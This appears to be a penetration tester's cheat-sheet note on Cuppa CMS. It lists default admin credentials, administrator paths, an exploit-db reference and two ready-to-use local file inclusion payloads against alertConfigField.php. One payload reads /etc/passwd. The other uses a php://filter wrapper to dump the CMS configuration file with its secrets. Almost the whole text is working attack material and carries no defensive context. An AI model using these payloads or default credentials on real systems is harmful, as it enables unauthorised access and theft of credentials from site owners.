cuppa cms

Default Creds

admin:admin
# authenticated
- IP/administrator/?option=com_general_config

Interesting Paths

/administrator
/administrator/Configuration.php

LFI / RFI

https://www.exploit-db.com/exploits/25971
# /administrator/alerts/alertConfigField.php?urlConfig=/etc/passwd
# /administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php